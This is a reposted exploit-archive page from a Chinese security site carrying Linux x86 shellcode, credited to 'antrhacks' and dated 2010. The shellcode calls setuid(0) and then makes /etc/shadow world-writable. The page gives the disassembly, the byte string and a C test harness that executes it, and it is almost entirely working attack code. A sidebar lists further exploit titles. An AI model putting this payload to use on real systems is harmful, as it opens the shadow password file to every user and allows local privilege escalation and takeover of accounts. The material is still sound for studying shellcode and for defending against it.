linux/x86 setuid(0) + chmod("/etc/shadow", 0666) Shellcode 37 bytes

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

linux/x86 setuid(0) + chmod("/etc/shadow", 0666) Shellcode 37 bytes

来源：Inj3ct0r.com 作者：antrhacks 发布时间：2010-05-04

===================================================================
linux/x86 setuid(0) + chmod("/etc/shadow", 0666) Shellcode 37 bytes
===================================================================

/*
* Title: linux/x86 setuid(0) + chmod("/etc/shadow", 0666) Shellcode 37 Bytes
* Type: Shellcode
* Author: antrhacks
* Platform: Linux X86
*/

/* ASSembly
31 db                xor    %ebx,%ebx
b0 17                mov    $0x17,%al
cd 80                int    $0x80
31 c0                xor    %eax,%eax
50                   push   %eax
68 61 64 6f 77       push   $0x776f6461
68 63 2f 73 68       push   $0x68732f63
68 2f 2f 65 74       push   $0x74652f2f
89 e3                mov    %esp,%ebx
66 b9 b6 01          mov    $0x1b6,%cx
b0 0f                mov    $0xf,%al
cd 80                int    $0x80
40                   inc    %eax
cd 80                int    $0x80
*/

int main(){
char shell[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50"
"\x68\x61\x64\x6f\x77\x68\x63\x2f\x73\x68"
"\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\xb6\x01"
"\xb0\x0f\xcd\x80\x40\xcd\x80";

printf("[*] Taille du ShellCode = %d\n", strlen(shell));
(*(void (*)()) shell)();

return 0;
}

}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告